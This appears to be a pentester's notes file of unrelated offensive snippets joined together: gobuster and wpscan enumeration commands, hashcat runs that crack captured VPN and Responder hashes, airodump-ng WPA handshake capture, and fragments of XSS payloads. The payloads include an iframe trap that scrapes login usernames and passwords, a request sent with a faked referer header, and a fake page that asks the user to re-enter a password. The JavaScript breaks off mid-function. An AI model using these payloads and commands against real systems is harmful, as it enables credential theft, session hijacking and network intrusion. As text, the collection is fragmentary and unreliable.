Using the proxy (burp) can result in ridiculously huge project files. You've been warned.
gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -p http://localhost:8080 -k -l
gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -k -l
You can use --wildcard if it's choking on responses; however, if it's sending back 302s for nonexistent paths,
just change up the accepted status codes:
gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -k -l -s 200,204,301,307,401,403
alert('Click ok when you\'re ready to enter iframe trap');
// Example credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value
function start()
{
alert("Start?");
}
function sendRequests()
{
// Setup the payment
IKE-PSK:
./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O
Responder:
hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule
example:
./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule
alert('Click ok when you\'re ready to enter iframe trap');
// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer
wpscan.rb --url http://yourwebsite.com --enumerate dbe
database exports
wpscan.rb --url http://yourwebsite.com --enumerate cb
config backups
wpscan.rb --url http://yourwebsite.com --enumerate vp
vuln plugins
wpscan.rb --url http://yourwebsite.com --enumerate vt
https://whatismyipaddress.com/blacklist-check
https://ipcheck.proofpoint.com/
https://www.ipvoid.com/ip-blacklist-check/
https://talosintelligence.com/reputation_center
https://www.cyren.com/security-center/cyren-ip-reputation-check
<html>
<body>
<script>
// Fake the application with a screenshot
document.body.outerHTML = '';
document.body.innerHTML = '';
document.body.style.backgroundImage = "url('http://localhost:80/background.png')";
document.body.style.backgroundRepeat = "no-repeat";
// Ask user to re-enter their password
airmon-ng check kill
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/
On nano, or other wifi access point monitoring:
airmon-ng start wlan1
airodump-ng -w PacketCapture wlan1mon
(Then just go near the AP you're wanting to crack and wait for someone to connect to it.)